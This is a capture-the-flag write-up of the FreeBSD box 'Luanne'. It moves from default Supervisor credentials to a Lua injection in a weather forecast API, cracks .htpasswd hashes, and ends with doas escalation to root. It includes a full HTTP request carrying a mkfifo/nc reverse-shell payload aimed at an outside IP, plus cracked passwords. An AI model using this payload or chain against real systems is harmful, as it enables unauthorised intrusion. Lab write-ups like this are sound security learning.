Luanne

Luanne has three ports open: 22 (SSH), 80 and 9001. Both 80 and 9001 require Basic Auth credentials. Nmap reveals that port 9001 has Supervisor process manager running, and after reading about default configurations of supervisor and trying default credentials, we get in. Theres not much to see expect the running processes of server: supervisor-processes-view

Also, port 80 has robots.txt which is not restricted by basic auth which tells us that there is /weather-endpoint which is functional but returns 404 status code. Running dirb on the port 80 with /weather-prefix reverals that there's some king of forecast-api service on /weather/forecast-endpoint. weather-forecast

It's more intuitive to use Burpsuite for playing with the api so after switching to burp and trying some special charecters the app returned an error:

forecast-error

This makes trying to find vulnerability a lot easier. I had no previous experience with lua so finding the correct syntax and exploit paths took some time but after some testing and googling about Lua syntax and FreeBSD functionality (Did I mention this box is FreeBSD and not regular linux? Oh well..) the payload that worked was:

 GET /weather/forecast?city=Lahti'+..+require("os")+..+print(os.execute("rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.50+1339+>/tmp/f"))' HTTP/1.1

Host: 10.129.43.222

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

After getting in running whoami tells that the user running web app was httpd. Supervisord process info reveals that there is also different instance running some kind of weather app on port 3001 as r.michales, which is only available from localhost. I tried the same payload on the port 3001 webapp but it seems like the exploit path was fixed on that app. Also, the basic auth is now required on every page and not just the index.

Now that we are in, it's not a bad idea to find the basic auth-credentials on the app we got in from and test the same credentials on the fixed weather app. weather-app's root folder has .httpasswd file which contains:

webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

Password seems to be MD5-Crypt-encrypted and after trying to brute force it with hashcat and rockyou.txt wordlist, we get the password "iamthebest".

So, this next part is really stupid and ridicilous but the app is ran by r.michaels so we can get access to r.michaels home directory with following command:

 curl -u webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/

<!DOCTYPE html>
<html><head><meta charset="utf-8"/>
<style type="text/css">
table {
border-top: 1px solid black;
border-bottom: 1px solid black;
}
th { background: aquamarine; }
tr:nth-child(even) { background: lavender; }
</style>
<title>Index of ~r.michaels/</title></head>
<body><h1>Index of ~r.michaels/</h1>
<table cols=3>
<thead>
<tr><th>Name<th>Last modified<th align=right>Size
<tbody>
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB
</table>
</body></html>

Theres link to idrsa fileā€¦ What the actual f is this.. Oh well just grab the idrsa file and login as r.michaels

Home folder of r.michales contains backup-folder with file "devel_backup-2020-09-16.tar.gz.enc". Decrypting with OpenSSL was not successful and after Googling for some alternatives for Encrypting on FreeBSD I stumbled on a tool called netpgp. Decrypting worked with command:

netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup.tar.gz   

The file still is packed with tar so let's unpack it by running commands

cd /tmp/
tar -xf devel_backup.tar.gz

The unpacked folder contains source code of the application with .htpasswrd-file with different hash than previously.

 webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

This password was cracked same ways as the previous one and the password is "littlebear". FreeBSD doesn't have sudo installed but has alternative doas which allows to run commands as root, so running the command

 doas -u root /bin/sh

with the password "littlebear" we got root. So stupid in so many ways. I would rate this box 0/5 but I learned something new about FreeBSD and Lua which were not familiar to me prior to this box so I'd give this one a solid 1/5.